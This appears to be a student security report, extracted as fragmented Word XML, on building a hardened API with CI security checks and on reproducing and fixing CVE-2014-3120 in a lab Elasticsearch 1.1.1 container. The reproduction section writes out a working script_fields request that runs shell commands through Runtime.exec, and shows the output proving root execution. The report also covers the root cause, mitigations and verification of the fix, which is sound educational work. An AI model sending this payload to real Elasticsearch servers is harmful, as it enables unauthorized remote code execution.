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CVE-2014-3120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mahaotian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23320311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22 / 10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https://github.com/mahaotian23320311/work1-secure-api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https://github.com/mahaotian23320311/work1-secure-api/actions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goal of the work is to walk the full security lifecycle of a small backend service: design it against the OWASP Top 10, automate the security checks in CI/CD, then take a real, publicly documented vulnerability, reproduce it in an isolated environment, explain its root cause, fix it and prove that the fix works without breaking the application.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Two deliverables are produced: a working, hardened REST API with a green pipeline, and a reproducible analysis of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CVE-2014-3120</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Elasticsearch 1.1.1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pi-smoke-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1 - API smoke test: 401 without a token, 401 on a wrong password, 200 with a valid JWT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All database access goes through parameterised statements. The query text and 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 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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> against both the login and the search endpoint: all are refused or return zero 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API answers with JSON, which is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> automatically XSS-safe — clients put the JSON into the DOM. Therefore every string is HTML-escaped on the way out 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 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 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 12. Two users with the same password get different hashes; a stolen database cannot be turned into passwords cheaply. SHA-256 would be useless here: it is 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 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 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 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 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and then </w:t>
      </w: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 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 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 wrong password.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 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 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Result of run #8 (the same commands, executed by the pipeline; the bandit step prints its report to the log so the result is visible without downloading the artifact):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453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tions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45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2 - GitHub Actions run #8: success, all three jobs green (Tests 17s, SAST 11s, SCA 25s)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5617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ast-ban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61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3 - GitHub Actions SAST job log: bandit reports no issues, 503 lines scanned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519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ca-pip-au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1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4 - GitHub Actions SCA job log: pip-audit reports no known vulnerabilities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CVE-2014-3120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Elasticsearch before 1.2.0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CWE-284 – improper access control (client-supplied code evaluation)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8.1 HIGH (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>; CVSS v2: 6.8)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28 July 2014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1.2.0 (dynamic scripting off by default); sandbox added in 1.4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Known exploited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Yes — CISA KEV, added 2022-03-25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NVD, Elastic security page, Vulhub </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>elasticsearch/CVE-2014-3120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Elasticsearch exposes a scripting subsystem: a search request may carry a script, and the node compiles and evaluates it inside its own JVM. Before 1.2 the default configuration allowed this for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>every</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> request, with no sandbox and no authentication, so one unauthenticated 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containing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>java.lang.Runtime.getRuntime().exec(...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> runs a command as the user that started the node — root, in the official image.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Vulhub environment for this CVE is exactly that default: a single </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>vulhub/elasticsearch:1.1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> container on port 9200.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-d</w:t>
        <w:br/>
        <w:t>$ curl -s http://127.0.0.1:9200/</w:t>
        <w:br/>
        <w:t>"number" : "1.1.1"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Index one document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-XPUT 'http://127.0.0.1:9200/blog/post/1' \</w:t>
        <w:br/>
        <w:t xml:space="preserve">      -H 'Content-Type: application/json' -d '{"title":"hello"}'</w:t>
        <w:br/>
        <w:t>{"_index":"blog","_type":"post","_id":"1","_version":1,"created":true}</w:t>
        <w:br/>
        <w:br/>
        <w:t>$ curl -s -XPOST 'http://127.0.0.1:9200/blog/_refresh'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Make the search API execute Java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-XPOST 'http://127.0.0.1:9200/_search' -H 'Content-Type: application/json' -d '{</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "size":1,"query":{"match_all":{}},</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "script_fields":{"pwn":{"script":"java.lang.Runtime.getRuntime().exec(new String[]{\"sh\",\"-c\",\"id &gt; /tmp/pwned.txt\"})"}}</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }'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response is an ordinary hit list, but the computed field is a process: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{"hits":{"total":1,"hits":[{"_index":"blog","_type":"post","_id":"1",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "fields":{"pwn":["java.lang.UNIXProcess@4de0408b"]}}]}}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6.3 Prove the command ran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docker compose exec -T es cat /tmp/pwned.txt</w:t>
        <w:br/>
        <w:t>uid=0(root) gid=0(root) groups=0(root)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Both requests were executed against the running container on this machine; the exact responses are in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ve-vulner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5 - CVE-2014-3120 reproduced on 1.1.1: the script runs, id is root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Elasticsearch's scripting feature lets a query compute values on the server. The design intent was convenience ("score boost", "script fields"); the security model was that the node is trusted and the client is not — except nothing enforced that.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Dangerous default.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Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>script.disable_dynamic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> defaulted to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> before 1.2, so any script in a request body was compiled and executed. The only barrier between an attacker and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Runtime.getRuntime()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> was the JSON parser.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No sandbox.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> In 1.0/1.1 the MVEL expression is evaluated with full Java reflection available. A scripting engine without a class filter is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for Java; the language choice (MVEL, then Groovy) changes nothing.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No authentication.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Elasticsearch 1.x has no users, roles or TLS, and the image binds </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>0.0.0.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. The CVSS vector lists </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>PR:L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because the vendor treats the API as privileged; on the network there is no credential at all, which is why the effective attack is pre-auth RCE.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Blast radius.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The node runs as root in this image, so the first command already has full control: read the data directory, reach the network, or exhaust the heap.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defect is therefore an access-control failure around a dangerous capability (CWE-284): code evaluation was treated as an ordinary data field. Every later fix is a way of taking that capability away from the client.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fault-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6 - the default 1.1.1 config has no script.disable_dynamic, so scripting is on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Three layers, weakest to strongest (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>vulnerability/hardened/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Configuration (mitigation)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 xml:space="preserve"> on the same 1.1.1 image. The node refuses to compile scripts arriving in a request; the search fails with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ScriptException[dynamic scripting disabled]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>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Patch (upgrade)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Elasticsearch 1.4.4. Dynamic scripting has been off by default since 1.2, and 1.4 adds a Groovy sandbox that filters classes.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Design</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — do not expose the scripting API to clients at all: network ACL, a reverse proxy that rejects </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>script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source</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in requests, or Elasticsearch ≥ 2.0, where dynamic scripting was removed.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# hardened/</w:t>
        <w:br/>
        <w:t>FROM vulhub/elasticsearch:1.1.1</w:t>
        <w:br/>
        <w:t>RUN echo "script.disable_dynamic: true" &gt;&gt; /usr/share/elasticsearch/config/elasticsearch.yml</w:t>
        <w:br/>
        <w:br/>
        <w:t># fixed/</w:t>
        <w:br/>
        <w:t>FROM vulhub/elasticsearch:1.4.4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Why this is effective: layer 1 removes the primitive ("compile what the client sent"), layer 2 removes it by default and adds a sandbox, layer 3 removes it from the reachable surface. A nuance worth stating in the report: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1.4.4 is not the end of the story</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — in 2015 the 1.4.x sandbox was bypassed again (CVE-2015-1427, Groovy sandbox escape) and 1.4.4 is still in that affected range. That is precisely why the design layer is the durable one: "no client-supplied scripts" survives the next clever expression, while a sandbox has to be perfect every time.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Same three requests, rebuilt environments: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t>$ curl -s -XPOST 'http://127.0.0.1:9200/_search' -d '{... script_fields ...}'</w:t>
        <w:br/>
        <w:t>HTTP/1.1 400   ScriptException[dynamic scripting for [groovy] disabled]</w:t>
        <w:br/>
        <w:br/>
        <w:t>$ docker compose exec -T es cat /tmp/pwned.txt</w:t>
        <w:br/>
        <w:t>cat: /tmp/pwned.txt: No such file or directory     # nothing executed</w:t>
        <w:br/>
        <w:br/>
        <w:t>$ curl -s 'http://127.0.0.1:9200/blog/post/_search?q=hello'</w:t>
        <w:br/>
        <w:t>{"hits":{"total":1, ...}}                          # service still works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To separate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>mitigation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>patch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, the vulnerable 1.1.1 image was also run with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>, i.e. the code is still 1.1.1 but the capability is switched off.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version.number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Attack response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/tmp/pwned.txt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Normal search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vulnerable/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> — 1.1.1, scripting on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pwn: ["java.lang.UNIXProcess@…"]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`uid=0(root)`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hardened/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> — 1.1.1 + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>script.disable_dynamic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fixed/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> — 1.4.4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for [groovy]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 — the command really ran, as root;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mitigation alone — same vulnerable code, attack refused, so the fix does not depend on the upgrade being possible;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patched release — the request dies before any script is compiled, and the error names the new default engine (Groovy), which shows the server still understands the request but no longer evaluates it.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Elasticsearch 1.1.1 (dynamic scripting enabled)</w:t>
        <w:br/>
        <w:t>VERDICT: code execution = SUCCESS (vulnerable, as expected)</w:t>
        <w:br/>
        <w:t>VERDICT: normal search = OK</w:t>
        <w:br/>
        <w:t>Result: PASS - vulnerability reproduced</w:t>
        <w:br/>
        <w:br/>
        <w:t>PHASE 2: Elasticsearch 1.1.1 + script.disable_dynamic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  <w:br/>
        <w:br/>
        <w:t>PHASE 3: Elasticsearch 1.4.4 (dynamic scripting off by default)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Raw transcript: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x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7 - 1.4.4 rejects the script (dynamic scripting for [groovy] disabled)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arde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8 - hardened 1.1.1 rejects the script, the search still works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work produced (a) a working API whose security properties are enforced in code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pinned by tests, (b) a CI pipeline that fails on a medium SAST finding or a vulnerable dependency, and (c) a reproducible exploitation-and-fix cycle for a real CVE.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most transferable lesson is from part (c): the flaw was not a missing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Elasticsearch 1.1.1 had a check — the request had to be well-formed JSON — but it treated </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as ordinary data, so the check was irrelevant. A capability that lets a client run code is not something a filter can make safe; it has to be removed from the reachable surface, or at minimum switched off by default. The same reasoning explains why the upgrade alone is not the whole answer: 1.4.4 fixed this CVE and still fell to a sandbox escape a year later (CVE-2015-1427), while "no client-supplied scripts" would have prevented both.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 can try billions of candidates per second. bcrypt is deliberately slow and tunable (cost 12 ≈ 2^12 rounds), and it stores a per-password salt inside the hash, so identical passwords produce different hashes and precomputed rainbow tables do not apply.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 every branch, including unreachable code, but produces false positives and cannot see configuration or runtime state. DAST attacks a running application from outside — it finds real, reachable issues but only covers what it can reach and gives less precise localisation.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 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 verifies the signature with a shared secret (HS256) or public key (RS256) and checks the time-based and issuer claims. The payload is signed, not encrypted — anyone can read it, so no secrets belong in it.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 privileges. An unpatched library with a known CVE (Log4Shell, the event-stream incident) gives an attacker code execution or data access without ever touching your own source. SCA is the only control that catches this, because SAST looks at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>your</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> code.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5.</w:t>
        <w:tab/>
      </w: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 disposable, isolated and reproducible: no host pollution, no leftover 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 version is pinned in a file that can be shared with the whole class.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6.</w:t>
        <w:tab/>
      </w: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 (Elasticsearch compiles and evaluates client-supplied scripts with full Java reflection and no authentication). An exploit is the concrete request that abuses it (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with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calling </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Runtime.getRuntime().exec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>). In this work the vulnerability is the dangerous default in the product; the exploit is the curl request.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7.</w:t>
        <w:tab/>
      </w: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 security fix that disables the feature is not a fix. Here, a perfectly "secure" answer would be to block the whole service; the regression check (the same document is still searchable after the fix) proves the legitimate path still works.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8.</w:t>
        <w:tab/>
      </w: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 working exploit looks like in order to judge whether a target is really affected, and a SOC analyst needs the same knowledge to recognise the traffic in logs. Reproduction turns a CVE description into a concrete signature: a search request carrying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is trivial to spot in a proxy log once you have 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